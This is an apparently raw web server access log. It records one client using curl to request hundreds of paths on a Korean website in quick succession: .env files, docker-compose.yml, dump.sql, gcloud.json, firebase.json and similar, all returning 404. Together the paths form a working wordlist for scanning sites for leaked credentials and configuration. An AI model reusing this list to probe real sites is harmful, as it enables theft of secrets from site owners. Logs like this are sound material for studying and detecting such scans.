[Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:12:25 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/docker-compose.yml" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:12:25 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/docker-compose/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:12:25 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/docker-compose/platform/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:12:25 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/docker-elk/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:12:26 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/docker-network-healthcheck/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:12:26 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/docker-node-mongo-redis/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:12:26 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/docker/compose/withMongo/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:12:26 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/docker/compose/withPostgres/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:12:27 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/docker/database/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:12:27 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/docker/db/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:12:27 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/docker/dev/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:12:27 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/docker/examples/compose/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:12:28 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/docker/postgres/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:12:28 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/docker/webdav/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:12:28 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/docs/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:12:28 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/dodoswap-client/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:12:29 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/dotfiles/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:12:29 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/download/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:12:29 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/downloads/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:12:29 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/drupal/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:12:30 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/dump.sql" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:12:30 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/e2e/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:12:30 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/en/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:12:30 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/engine/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:12:31 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/env.example" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:12:31 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/env.save" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:12:31 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/env.template" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:12:31 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/env/dockers/mariadb-test/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:12:32 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/env/dockers/php-apache/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:12:32 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/env/example/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:12:32 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/env/template/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:12:32 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/environments/local/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:12:33 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/environments/production/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:12:33 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/envs/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:12:33 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/error.log" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:12:33 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/error/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:12:34 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/errors/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:12:34 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/example/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:12:34 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/example02-golang-package/import-underscore/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:12:34 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/example27-how-to-load-env/sample01/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:12:35 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/example27-how-to-load-env/sample02/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:12:35 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/examples/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:12:35 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/examples/01-simple-model/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:12:35 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/examples/02-complex-example/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:12:36 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/examples/03-one-to-many-relationship/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:12:36 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/examples/04-many-to-many-relationship/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:12:36 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/examples/05-migrations/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:12:36 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/examples/06-base-service/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:12:37 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/examples/07-feature-flags/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:12:37 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/examples/08-performance/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:12:37 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/examples/09-production/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:12:37 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/examples/10-subscriptions/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:12:38 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/examples/11-transactions/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:12:38 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/examples/drupal-separate-services/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:12:38 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/examples/react-dashboard/backend/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:12:38 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/examples/sdl-first/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:12:39 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/examples/sdl-first/prisma/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:12:39 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/examples/vue-dashboard/backend/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:12:39 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/examples/web/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:12:39 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/examples/with-cookie-auth-fauna/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:12:40 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/examples/with-dotenv/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:12:40 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/examples/with-firebase-authentication-serverless/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:12:40 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/examples/with-react-relay-network-modern/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:12:41 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/examples/with-relay-modern/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:12:41 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/examples/with-universal-configuration-build-time/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:12:41 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/exapi/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:12:41 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/Exercise.Frontend/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:12:42 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/Exercise.Frontend/train/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:12:42 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/export/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:12:42 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/fastlane/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:12:42 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/favicons/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:12:43 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/favs/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:12:43 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/FE/huey/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:12:43 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/fedex/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:12:43 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/fhir-api/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:12:44 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/files/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:12:44 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/fileserver/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:12:44 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/films/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:12:44 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/Final_Project/Airflow_Dag/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:12:45 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/Final_Project/kafka_twitter/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:12:45 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/Final_Project/StartingFile/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:12:45 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/finalVersion/lcomernbootcamp/projbackend/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:12:45 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/firebase.json" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:12:46 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/first-network/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:12:46 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/FIRST_CONFIG/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:12:46 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/fisdom/fisdom/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:12:46 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/fixtures/blocks/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:12:47 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/fixtures/fiber-debugger/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:12:47 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/fixtures/flight/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:12:47 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/fixtures/kitchensink/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:12:47 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/flask/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:12:48 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/flask_test_uploads/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:12:48 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/fm/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:12:48 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/font-icons/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:12:48 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/fonts/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:12:49 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/framework/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:12:49 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/front-app/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:12:49 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/front-empathy/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:12:49 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/front-end/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:12:50 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/front/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:12:50 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/front/src/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:12:50 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/frontend/momentum-fe/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:12:50 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/frontend/react/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:12:51 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/frontend/vue/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:12:51 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/frontend/web/debug/default/view" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:12:51 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/frontendfinaltest/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:12:51 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/ftp/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:12:52 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/ftpmaster/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:12:52 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/functions/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:12:52 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/gcloud.json" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:12:52 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/gcp/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:12:53 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/gists/cache" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:12:53 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/gists/laravel" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:12:53 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/gists/pusher" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:12:53 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/github-connect/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:12:54 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/google/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:12:54 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/graphiql/" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:12:54 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/graphql/" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:12:54 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/grems-api/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:12:55 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/grems-frontend/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:12:55 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/Hash/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:12:55 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/hasura/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:12:55 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/hc/restricted" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:12:56 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/Helmetjs/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:12:56 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/hgs-static/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:12:56 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/higlass-website/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:12:56 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/home/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:12:57 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/horde/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:12:57 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/hotpot-app-frontend/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:12:57 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/htdocs/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:12:57 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/html/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:12:58 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/http/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:12:58 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/httpboot/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:12:58 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/httpdocs/.env" [Client 185.177.72.38] 